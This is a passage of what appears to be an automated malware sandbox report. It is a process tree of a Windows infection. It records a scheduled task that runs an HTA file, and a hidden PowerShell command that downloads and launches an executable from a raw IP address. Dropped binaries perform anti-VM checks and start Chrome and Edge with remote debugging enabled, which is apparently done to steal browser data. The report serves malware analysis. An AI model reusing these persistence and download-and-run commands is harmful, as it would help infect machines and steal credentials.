      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2340
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "avPHqma8IwB" /tr "mshta \"C:\Temp\fQEVbteTG.hta\"" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5348
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\fQEVbteTG.hta"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4732
    - - C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2584
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1222cc40,0x7ffe1222cc4c,0x7ffe1222cc58
        7⤵
        
        PID:1608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2128,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2124 /prefetch:2
        7⤵
        
        PID:3964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2160 /prefetch:3
        7⤵
        
        PID:5708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2488 /prefetch:8
        7⤵
        
        PID:3948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:6116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3656,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4492 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4528,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4652 /prefetch:8
        7⤵
        
        PID:1460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8
        7⤵
        
        PID:5616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
        7⤵
        
        PID:968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8
        7⤵
        
        PID:5580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
        7⤵
        
        PID:5812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5128 /prefetch:8
        7⤵
        
        PID:5268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5052,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5148 /prefetch:8
        7⤵
        
        PID:2124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:8
        7⤵
        
        PID:6028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5368,i,12432997406368343651,14301038638506438235,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5328 /prefetch:2
        7⤵
        Uses browser remote debugging
        
        PID:6048
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe126346f8,0x7ffe12634708,0x7ffe12634718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5704
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        7⤵
        
        PID:1140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        7⤵
        
        PID:5572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
        7⤵
        
        PID:3424
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        7⤵
        
        PID:5220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2352 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3256
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        7⤵
        
        PID:6136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2544 /prefetch:2
        7⤵
        
        PID:3676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4732 /prefetch:2
        7⤵
        
        PID:4008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,807891465209587419,9769189485296811947,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2296 /prefetch:2
        7⤵
        
        PID:3396
    - - C:\Users\Admin\AppData\Local\Temp\10109990101\rXOl0pp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109990101\rXOl0pp.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5264
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe1192cc40,0x7ffe1192cc4c,0x7ffe1192cc58
        7⤵
        
        PID:2828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2
        7⤵
        
        PID:5148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2204 /prefetch:3
        7⤵
        
        PID:5904
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2408 /prefetch:8
        7⤵
        
        PID:5216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3236,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4648 /prefetch:8
        7⤵
        
        PID:4080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4680 /prefetch:8
        7⤵
        
        PID:5788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4896,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4848 /prefetch:8
        7⤵
        
        PID:2236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4860 /prefetch:8
        7⤵
        
        PID:1800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5068 /prefetch:8
        7⤵
        
        PID:2160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5124 /prefetch:8
        7⤵
        
        PID:968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5044,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5072 /prefetch:8
        7⤵
        
        PID:6016
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5144 /prefetch:8
        7⤵
        
        PID:396
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4964,i,5783028943170256585,13430580304814338232,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:2
        7⤵
        Uses browser remote debugging
        
        PID:5592
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe122346f8,0x7ffe12234708,0x7ffe12234718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
